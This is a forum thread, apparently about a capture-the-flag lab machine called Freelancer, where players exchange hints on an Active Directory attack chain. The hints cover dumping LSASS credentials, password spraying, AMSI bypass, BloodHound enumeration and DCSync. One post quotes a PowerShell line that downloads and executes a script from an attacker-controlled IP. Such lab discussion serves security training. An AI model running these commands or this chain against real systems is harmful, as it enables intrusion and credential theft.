Official Freelancer Discussion

Thanks, but I already have a reverse shell; I’m trying to run mimikatz

Ok, thank you very much for giving me this hint, I have downloaded the file using ftp, it took me several days, haha

Did you solve this? I have two passwords from the LSASS dump, using impacket - but neither of them work with lorra?

For lorra199, is the password PWN*13 the correct one, from the DMP file?

Try password spraying with CrackMapExec

yes

Everyone, I have got the password of lorra199 and logged in with evil-winrm, but I don’t have much experience with Windows rights. What should I do next?

My AD knowledge is letting me down here, what other tools can you run to look for vulns? Stuck on this part now…

In AD, since the attack surface is too big, you should look for permission misconfiguration.
Check the user’s privileges and research what you can do with them.

A simple “whoami /priv” will do.

If, even after researching the current user’s privilege abuse path, you find yourself struggling, DM me for a more direct hint.

2 Likes

Bloodhound helps a LOT for this but you’ll need to bypass AMSI to get Sharphound to work.

1 Like

So, I think I got the AMSI bypass working, using the hardware breakpoint as described here: “Bypassing AMSI using Hardware Break Points — In 2024” by Zeyad Mohammed (Medium, May 2024).

However, when I upload and run SharpHound.ps1 like this: iex(New-Object Net.WebClient).DownloadString('http://10.10.14.203:9001/SharpHound.ps1') I just get absolutely no output? I can’t even get the Help contents to appear…

*Evil-WinRM* PS C:\Users\lorra199\Documents> Invoke-BloodHound -Version
*Evil-WinRM* PS C:\Users\lorra199\Documents> Invoke-BloodHound -Help
*Evil-WinRM* PS C:\Users\lorra199\Documents> 

If you downgrade your BloodHound environment you can get bloodhound-python to work much more easily for this box. It’s not as good as SharpHound, but man, getting SharpHound to work was a pain for me. I just eventually resorted to an older BloodHound.

Could try the SharpHound binary instead of the PS1 script. Not sure if it will run on this box; I didn’t try the binary.

1 Like

Interesting, I did try $ bloodhound-python -d freelancer.htb -u freelancer\lorra199 -p PWN3D#l0rr@Arm****** -ns 10.10.11.5 but then get an LDAP auth error CollectionException('Could not authenticate to LDAP. Check your credentials and LDAP server requirements.')

I’m assuming I’ve got some of the parameters wrong here?

I had that issue also.

Two things that helped me resolve it. Or I just got lucky.

1: This box has a clock skew on the DC. You need to sync your attack box to the DC’s time so it’s not off greatly. This will come in handy with root also :slight_smile:

2: This box was very buggy. Sometimes you just gotta reset it like two or three times for it to finally work. I can’t count how many times I reset this one.

1 Like

Ah ha! It works finally, and I have a possible path in BloodHound, using DCSync :thinking:

1 Like

Sometimes BloodHound will give you DCSync but you might need local admin level permissions at least to execute it with Mimikatz.

Try researching about the permissions your user has.
Everybody is always eager to jump to Bloodhound without even checking a simple ‘whoami /priv’.

1 Like

Ha, yes literally just messaged @FroggieDrinks about that stumbling block with a DCSync. Will research the current permissions more…

1 Like

Finally!! That was a heck of a challenge, thanks for all the help folks!

1 Like